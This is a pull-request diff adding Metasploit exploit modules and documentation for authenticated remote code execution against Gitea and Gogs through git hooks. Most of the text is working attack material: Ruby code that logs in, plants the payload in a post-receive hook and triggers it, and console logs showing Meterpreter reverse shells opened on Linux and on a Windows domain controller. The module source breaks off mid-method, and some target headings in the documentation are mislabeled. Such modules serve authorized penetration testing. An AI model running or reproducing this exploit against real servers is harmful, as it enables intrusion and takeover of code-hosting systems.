### PR TITLE
Gitea and Gogs Git Hooks RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/gitea_git_hooks_rce.md
+++ b/documentation/modules/exploit/multi/http/gitea_git_hooks_rce.md
@@ -1,0 +1,322 @@
+## Vulnerable Application
+
+### Description
+
+This module leverages an insecure setting to get remote code execution on the
+target OS in the context of the user running Gitea. This is possible when the
+current user is allowed to create `git hooks`, which is the default for
+administrative users. For non-administrative users, the permission needs to be
+specifically granted by an administrator.
+
+To achieve code execution, the module authenticates to the Gitea web interface,
+creates a temporary repository, sets a `post-receive` git hook with the payload
+and creates a dummy file in the repository. This last action will trigger the
+git hook and execute the payload. Everything is done through the web interface.
+
+It has been mitigated in version 1.13.0 by setting the Gitea
+`DISABLE_GIT_HOOKS` configuration setting to `true` by default. This disables
+this feature and prevents all users (including admin) from creating custom git
+hooks.
+
+This module has been tested successfully against Docker versions 1.12.5, 1.12.6
+and 1.13.6 with `DISABLE_GIT_HOOKS` set to `false`, and on version 1.12.6 on
+Windows.
+
+### Setup
+
+Follow the installation steps:
+- With Docker: https://docs.gitea.io/en-us/install-with-docker/
+- From binary: https://docs.gitea.io/en-us/install-from-binary/
+- From package: https://docs.gitea.io/en-us/install-from-package/
+
+## Verification Steps
+
+1. Install the application (follow [Setup](#setup))
+1. Start msfconsole
+1. Do: `use multi/http/gitea_git_hooks_rce`
+1. Do: `set USERNAME <username>`
+1. Do: `set PASSWORD <password>`
+1. Do: `set rhosts <ip>`
+1. Do: `set rport <port>`
+1. Do: `set lhost <ip>`
+1. Do: `set target <target #>`
+1. Do: `run`
+1. You should get session.
+
+## Targets
+
+### 0 (Unix Command)
+
+This executes a Unix command.
+
+### 1 (Linux Dropper)
+
+This uses a Linux dropper to execute code.
+
+### 2 (Unix Command)
+
+This executes a Windows command.
+
+### 3 (Linux Dropper)
+
+This uses a Windows dropper to execute code.
+
+## Options
+
+### TARGETURI
+
+The base path of the Gitea application, which is set to `/` by default.
+
+### USERNAME
+
+The username to authenticate with.
+
+### PASSWORD
+
+The password to authenticate with.
+
+## Scenarios
+
+### Gitea 1.12.6 on Docker
+
+```
+msf6 > use multi/http/gitea_git_hooks_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME msfuser
+USERNAME => msfuser
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD Msf!23
+PASSWORD => Msf!23
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set LHOST 192.168.1.75
+LHOST => 192.168.1.75
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set RPORT 3000
+RPORT => 3000
+msf6 exploit(multi/http/gitea_git_hooks_rce) > options
+
+Module options (exploit/multi/http/gitea_git_hooks_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   Msf!23           yes       Password to use
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      3000             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   msfuser          yes       Username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.75     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_hooks_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.75:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Gitea version is 1.12.6
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Authenticate with "msfuser/Msf!23"
+[*] Get "csrf" value
+[+] csrf=T1KKDKlPGzvIj4fuomjsVJEa-MU6MTYxNzE5OTU0NzU0MTcyNzcwMA
+[+] Logged in
+[*] Create repository "Sonair_Trippledex"
+[*] Get "csrf" and "uid" values
+[+] csrf=9836W_NOSYO4u-1hnrr5F9UZ4dg6MTYxNzE5OTU0ODU0MjM4MzQwMA
+[+] uid=1
+[+] Repository created
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAA...<redacted>
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAO...<redacted>
+[*] Setup post-receive hook with command
+[*] Get "csrf" value
+[+] csrf=9836W_NOSYO4u-1hnrr5F9UZ4dg6MTYxNzE5OTU0ODU0MjM4MzQwMA
+[+] Git hook setup
+[*] Create a dummy file on the repo to trigger the payload
+[*] Get "csrf" and "last_commit" values
+[+] csrf=9836W_NOSYO4u-1hnrr5F9UZ4dg6MTYxNzE5OTU0ODU0MjM4MzQwMA
+[+] last_commit=4d92bd44d30756f8cecaf2682cb4dd5129856085
+[*] RfWwr.txt created
+[+] File created, shell incoming...
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3008420 bytes) to 192.168.1.75
+[*] Meterpreter session 1 opened (192.168.1.75:4444 -> 192.168.1.75:61289) at 2021-03-31 16:05:51 +0200
+[*] Cleaning up
+[*] Get "csrf" value
+[+] csrf=9836W_NOSYO4u-1hnrr5F9UZ4dg6MTYxNzE5OTU0ODU0MjM4MzQwMA
+[*] Repository Sonair_Trippledex deleted.
+
+meterpreter > getuid
+Server username: git @ 7ed1d63a11a7 (uid=1000, gid=1000, euid=1000, egid=1000)
+meterpreter > sysinfo
+Computer     : 172.20.0.3
+OS           :  (Linux 4.19.121-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Gitea 1.12.6 on Windows
+
+```
+msf6 > use multi/http/gitea_git_hooks_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME msfuser
+USERNAME => msfuser
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD Msf!23
+PASSWORD => Msf!23
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhosts 192.168.144.195
+rhosts => 192.168.144.195
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set RPORT 3000
+RPORT => 3000
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set LHOST 192.168.144.1
+LHOST => 192.168.144.1
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set target 3
+target => 3
+msf6 exploit(multi/http/gitea_git_hooks_rce) > options
+
+Module options (exploit/multi/http/gitea_git_hooks_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   Msf!23           yes       Password to use
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.144.195  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      3000             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   msfuser          yes       Username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.144.1    yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   3   Windows Dropper
+
+
+msf6 exploit(multi/http/gitea_git_hooks_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_hooks_rce) > run
+
+[*] Started reverse TCP handler on 192.168.144.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Gitea version is 1.12.6
+[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
+[*] Authenticate with "msfuser/Msf!23"
+[*] Get "csrf" value
+[+] csrf=sr_-bvGEAyHL7kVegnyVKQHLeiQ6MTYxNzE5OTc4NDAwNTMzODkwMA
+[+] Logged in
+[*] Create repository "Overhold_Aerified"
+[*] Get "csrf" and "uid" values
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] uid=1
+[+] Repository created
+[*] Generated command stager: ["echo -n TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAA...<redacted>
+[*] Executing command: echo -n TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAA...<redacted>
+[*] Setup post-receive hook with command
+[*] Get "csrf" value
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] Git hook setup
+[*] Create a dummy file on the repo to trigger the payload
+[*] Get "csrf" and "last_commit" values
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] last_commit=c3b19ce94e7d881e44d8c69b99db7625a61a1408
+[*] QzUyEvdG.txt created
+[+] File created
+[*] Command Stager progress -  20.14% done (2046/10161 bytes)
+[*] Executing command: echo -n AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...<redacted>
+[*] Setup post-receive hook with command
+[*] Get "csrf" value
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] Git hook setup
+[*] Create a dummy file on the repo to trigger the payload
+[*] Get "csrf" and "last_commit" values
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] last_commit=591d40885bfab38ca97a9e7fecd3f5a4ad42dfc0
+[*] BjLeoDF.txt created
+[+] File created
+[*] Command Stager progress -  40.27% done (4092/10161 bytes)
+[*] Executing command: echo -n AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...<redacted>
+[*] Setup post-receive hook with command
+[*] Get "csrf" value
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] Git hook setup
+[*] Create a dummy file on the repo to trigger the payload
+[*] Get "csrf" and "last_commit" values
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] last_commit=8e72d9f4188aa71bd20422a95a478aca81b21107
+[*] zMjwGd.txt created
+[+] File created
+[*] Command Stager progress -  60.41% done (6138/10161 bytes)
+[*] Executing command: echo -n AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...<redacted>
+[*] Setup post-receive hook with command
+[*] Get "csrf" value
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] Git hook setup
+[*] Create a dummy file on the repo to trigger the payload
+[*] Get "csrf" and "last_commit" values
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] last_commit=e8e13e991fe8310590f0372740c4ad034a94d0b2
+[*] Cnaoh.txt created
+[+] File created
+[*] Command Stager progress -  80.54% done (8184/10161 bytes)
+[*] Executing command: echo -n AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...<redacted>
+[*] Setup post-receive hook with command
+[*] Get "csrf" value
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] Git hook setup
+[*] Create a dummy file on the repo to trigger the payload
+[*] Get "csrf" and "last_commit" values
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[+] last_commit=fcfdbab5b2d62674e56c35a0867415426935a4a4
+[*] PYITonlR.txt created
+[+] File created, shell incoming...
+[*] Command Stager progress - 100.00% done (10161/10161 bytes)
+[*] Sending stage (200262 bytes) to 192.168.144.195
+[*] Meterpreter session 1 opened (192.168.144.1:4444 -> 192.168.144.195:54112) at 2021-03-31 16:10:04 +0200
+[*] Cleaning up
+[*] Get "csrf" value
+[+] csrf=En0ZHw8mYn_sR0mvf9XQ-TlPmIY6MTYxNzE5OTc4NTAwNTg5ODUwMA
+[*] Repository Overhold_Aerified deleted.
+
+meterpreter > getuid
+Server username: ADLAB\Administrator
+meterpreter > sysinfo
+Computer        : DC01
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : ADLAB
+Logged On Users : 4
+Meterpreter     : x64/windows
+```

--- a/documentation/modules/exploit/multi/http/gogs_git_hooks_rce.md
+++ b/documentation/modules/exploit/multi/http/gogs_git_hooks_rce.md
@@ -1,0 +1,170 @@
+## Vulnerable Application
+
+### Description
+This module leverages an insecure setting to get remote code execution on the
+target OS in the context of the user running Gogs. This is possible when the
+current user is allowed to create `git hooks`, which is the default for
+administrative users. For non-administrative users, the permission needs to be
+specifically granted by an administrator.
+
+To achieve code execution, the module authenticates to the Gogs web interface,
+creates a temporary repository, sets a `post-receive` git hook with the payload
+and creates a dummy file in the repository. This last action will trigger the
+git hook and execute the payload. Everything is done through the web interface.
+
+No mitigation has been implemented so far (latest stable version is 0.12.3).
+
+This module has been tested successfully against version 0.12.3 on Docker.
+Windows version could not be tested since the git hook feature seems to be
+broken.
+
+### Setup
+
+Follow the installation steps:
+- With Docker: https://github.com/gogs/gogs/tree/main/docker
+- From binary: https://gogs.io/docs/installation/install_from_binary
+- From package: https://gogs.io/docs/installation/install_from_packages
+
+## Verification Steps
+
+1. Install the application (follow [Setup](#setup))
+1. Start msfconsole
+1. Do: `use multi/http/gogs_git_hooks_rce`
+1. Do: `set USERNAME <username>`
+1. Do: `set PASSWORD <password>`
+1. Do: `set rhosts <ip>`
+1. Do: `set rport <port>`
+1. Do: `set lhost <ip>`
+1. Do: `set target <target #>`
+1. Do: `run`
+1. You should get session.
+
+## Targets
+
+### 0 (Unix Command)
+
+This executes a Unix command.
+
+### 1 (Linux Dropper)
+
+This uses a Linux dropper to execute code.
+
+### 0 (Unix Command)
+
+This executes a Windows command.
+
+### 1 (Linux Dropper)
+
+This uses a Windows dropper to execute code.
+
+## Options
+
+### TARGETURI
+
+The base path of the Gitea application, which is set to `/` by default.
+
+### USERNAME
+
+The username to authenticate with.
+
+### PASSWORD
+
+The password to authenticate with.
+
+## Scenarios
+
+### Gogs 0.12.3 on Docker
+
+```
+msf6 > use multi/http/gogs_git_hooks_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gogs_git_hooks_rce) > set USERNAME msfuser
+USERNAME => msfuser
+msf6 exploit(multi/http/gogs_git_hooks_rce) > set PASSWORD Msf!23
+PASSWORD => Msf!23
+msf6 exploit(multi/http/gogs_git_hooks_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(multi/http/gogs_git_hooks_rce) > set RPORT 10080
+RPORT => 10080
+msf6 exploit(multi/http/gogs_git_hooks_rce) > set LHOST 192.168.1.75
+LHOST => 192.168.1.75
+msf6 exploit(multi/http/gogs_git_hooks_rce) > options
+
+Module options (exploit/multi/http/gogs_git_hooks_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   Msf!23           yes       Password to use
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      10080            yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   msfuser          yes       Username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.75     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(multi/http/gogs_git_hooks_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gogs_git_hooks_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.75:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Gogs found
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Authenticate with "msfuser/Msf!23"
+[*] Get "csrf" value
+[+] csrf=RDAhjRw_I0Uf85CuY4_SBFjbO1A6MTYxNzIwMDUzNjMzNjg2NjEwMA
+[+] Logged in
+[*] Create repository "Sonsing_Duobam"
+[*] Get "csrf" and "user_id" values
+[+] csrf=sOMJHrFMKnfcrle5apA9CzNJ4DQ6MTYxNzIwMDUzNzMwMDk0MTgwMA
+[+] user_id=1
+[+] Repository created
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAA...<redacted>
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAA...<redacted>
+[*] Setup post-receive hook with command
+[*] Get "csrf" value
+[+] csrf=sOMJHrFMKnfcrle5apA9CzNJ4DQ6MTYxNzIwMDUzNzMwMDk0MTgwMA
+[+] Git hook setup
+[*] Create a dummy file on the repo to trigger the payload
+[*] Get "csrf" and "last_commit" values
+[+] csrf=sOMJHrFMKnfcrle5apA9CzNJ4DQ6MTYxNzIwMDUzNzMwMDk0MTgwMA
+[+] last_commit=f8bbde6c14b8bbe92edfc802812a24be30e3fdbb
+[*] qJcA.txt created
+[+] File created, shell incoming...
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3008420 bytes) to 192.168.1.75
+[*] Meterpreter session 1 opened (192.168.1.75:4444 -> 192.168.1.75:61502) at 2021-03-31 16:22:20 +0200
+[*] Cleaning up
+[*] Get "csrf" value
+[+] csrf=sOMJHrFMKnfcrle5apA9CzNJ4DQ6MTYxNzIwMDUzNzMwMDk0MTgwMA
+[*] Repository Sonsing_Duobam deleted.
+
+meterpreter > getuid
+Server username: git @ 4f1193a0be31 (uid=1000, gid=1000, euid=1000, egid=1000)
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           :  (Linux 4.19.121-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```

--- a/modules/exploits/multi/http/gitea_git_hooks_rce.rb
+++ b/modules/exploits/multi/http/gitea_git_hooks_rce.rb
@@ -1,0 +1,387 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gitea Git Hooks Remote Code Execution',
+        'Description' => %q{
+          This module leverages an insecure setting to get remote code
+          execution on the target OS in the context of the user running Gitea.
+          This is possible when the current user is allowed to create `git
+          hooks`, which is the default for administrative users. For
+          non-administrative users, the permission needs to be specifically
+          granted by an administrator.
+
+          To achieve code execution, the module authenticates to the Gitea web
+          interface, creates a temporary repository, sets a `post-receive` git
+          hook with the payload and creates a dummy file in the repository.
+          This last action will trigger the git hook and execute the payload.
+          Everything is done through the web interface.
+
+          It has been mitigated in version 1.13.0 by setting the Gitea
+          `DISABLE_GIT_HOOKS` configuration setting to `true` by default. This
+          disables this feature and prevents all users (including admin) from
+          creating custom git hooks.
+
+          This module has been tested successfully against docker versions 1.12.5,
+          1.12.6 and 1.13.6 with `DISABLE_GIT_HOOKS` set to `false`, and on
+          version 1.12.6 on Windows.
+        },
+        'Author' => [
+          'Podalirius',             # Original PoC
+          'Christophe De La Fuente' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2020-14144'],
+          ['EDB', '49571'],
+          ['URL', 'https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/'],
+          ['URL', 'https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1126-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/']
+        ],
+        'DisclosureDate' => '2020-10-07',
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux win],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => { 'WfsDelay' => 30 },
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with']),
+      OptString.new('PASSWORD', [true, 'Password to use']),
+    ])
+
+    @need_cleanup = false
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    # Powered by Gitea Version: 1.12.5
+    unless (match = res.body.match(/Powered by Gitea Version: (?<version>[\d.]+)/))
+      return CheckCode::Unsupported('Target does not appear to be running Gitea.')
+    end
+
+    if Rex::Version.new(match[:version]) >= Rex::Version.new('1.13.0')
+      print_warning(
+        'This version of Gitea has the "DISABLE_GIT_HOOKS" option set to true '\
+        'by default. This prevents all users (including admin) from creating '\
+        'custom git hooks. This exploit might not work if this option is still '\
+        'set to the default value.'
+      )
+    end
+    CheckCode::Appears("Gitea version is #{match[:version]}")
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    print_status("Authenticate with \"#{datastore['USERNAME']}/#{datastore['PASSWORD']}\"")
+    gitea_login
+    print_good('Logged in')
+
+    @repo_name = [Faker::App.name, Faker::App.name].join('_').gsub(' ', '_')
+    print_status("Create repository \"#{@repo_name}\"")
+    gitea_create_repo
+    @need_cleanup = true
+    print_good('Repository created')
+
+    case target['Type']
+    when :unix_cmd, :win_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper, :win_dropper
+      execute_cmdstager(background: true, delay: 1)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    print_status('Setup post-receive hook with command')
+    gitea_post_receive_hook(cmd)
+    print_good('Git hook setup')
+
+    print_status('Create a dummy file on the repo to trigger the payload')
+    last_chunk = if cmd_list
+                   cmd == cmd_list.last
+                 else
+                   true
+                 end
+    gitea_create_file(last_chunk: last_chunk)
+    print_good("File created#{', shell incoming...' if last_chunk}")
+  end
+
+  def http_post_request(uri, opts = {})
+    csrf = opts.delete(:csrf) || get_csrf(uri)
+    timeout = opts.delete(:timeout) || 20
+
+    post_data = { _csrf: csrf }.merge(opts)
+    request_hash = {
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], uri),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => post_data
+    }
+
+    send_request_cgi(request_hash, timeout)
+  end
+
+  def get_csrf(uri)
+    vprint_status('Get "csrf" value')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(uri)
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Unable to get the CSRF token')
+    end
+
+    csrf = extract_value(res, '_csrf')
+    vprint_good("csrf=#{csrf}")
+    csrf
+  end
+
+  def extract_value(res, attr)
+    # <input type="hidden" name="_csrf" value="Ix7E3_U_lOt-kZfeMjEll57hZuU6MTYxNzAyMzQwOTEzMjU1MDUwMA">
+    # <input type="hidden" id="uid" name="uid" value="2" required>
+    # <input type="hidden" name="last_commit" value="6a7eb84e9a8e4e76a93ea3aec67b2f70fe2518d2">
+    unless (match = res.body.match(/<input .*name="#{attr}" +value="(?<value>[^"]+)".*>/))
+      return fail_with(Failure::NotFound, "\"#{attr}\" not found in response")
+    end
+
+    return match[:value]
+  end
+
+  def gitea_login
+    res = http_post_request(
+      '/user/login',
+      user_name: datastore['USERNAME'],
+      password: datastore['PASSWORD']
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Unable to reach the login page')
+    end
+
+    unless res.code == 302
+      fail_with(Failure::NoAccess, 'Login failed')
+    end
+
+    nil
+  end
+
+  def gitea_create_repo
+    uri = normalize_uri(datastore['TARGETURI'], '/repo/create')
+
+    res = send_request_cgi('method' => 'GET', 'uri' => uri)
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    vprint_status('Get "csrf" and "uid" values')
+    csrf = extract_value(res, '_csrf')
+    vprint_good("csrf=#{csrf}")
+    uid = extract_value(res, 'uid')
+    vprint_good("uid=#{uid}")
+
+    res = http_post_request(
+      uri,
+      uid: uid,
+      repo_name: @repo_name,
+      private: 'on',
+      description: '',
+      repo_template: '',
+      issue_labels: '',
+      gitignores: '',
+      license: '',
+      readme: 'Default',
+      auto_init: 'on',
+      default_branch: 'master',
+      csrf: csrf
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    unless res.code == 302
+      fail_with(Failure::UnexpectedReply, 'Create repository failure')
+    end
+
+    nil
+  end
+
+  def gitea_post_receive_hook(cmd)
+    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/settings/hooks/git/post-receive')
+    shell = <<~SHELL
+      #!/bin/bash
+      #{cmd}&
+      exit 0
+    SHELL
+
+    res = http_post_request(uri, content: shell)
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    unless res.code == 302
+      msg = 'Post-receive hook creation failure'
+      if res.code == 404
+        msg << ' (user is probably not allowed to create Git Hooks)'
+      end
+      fail_with(Failure::UnexpectedReply, msg)
+    end
+
+    nil
+  end
+
+  def gitea_create_file(last_chunk: false)
+    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/_new/master')
+    filename = "#{Rex::Text.rand_text_alpha(4..8)}.txt"
+
+    res = send_request_cgi('method' => 'GET', 'uri' => uri)
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    vprint_status('Get "csrf" and "last_commit" values')
+    csrf = extract_value(res, '_csrf')
+    vprint_good("csrf=#{csrf}")
+    last_commit = extract_value(res, 'last_commit')
+    vprint_good("last_commit=#{last_commit}")
+
+    http_post_request(
+      uri,
+      last_commit: last_commit,
+      tree_path: filename,
+      content: Rex::Text.rand_text_alpha(1..20),
+      commit_summary: '',
+      commit_message: '',
+      commit_choice: 'direct',
+      csrf: csrf,
+      timeout: last_chunk ? 0 : 20 # The last one never returns, don't bother waiting
+    )
+    vprint_status("#{filename} created")
+
+    nil
+  end
+
+  # Hook the HTTP client method to add specific cookie management logic
+  def send_request_cgi(opts, timeout = 20)
+    res = super
+
+    return unless res
+
+    # HTTP client does not handle cookies with the same name correctly. It adds
+    # them instead of substituing the old value with the new one.
+    unless res.get_cookies.empty?
+      cookie_jar_hash = cookie_jar_to_hash
+      cookies_from_response = cookie_jar_to_hash(res.get_cookies.split(' '))
+      cookie_jar_hash.merge!(cookies_from_response)
+      cookie_jar_updated = cookie_jar_hash.each_with_object(Set.new) do |cookie, set|
+        set << "#{cookie[0]}=#{cookie[1]}"
+      end
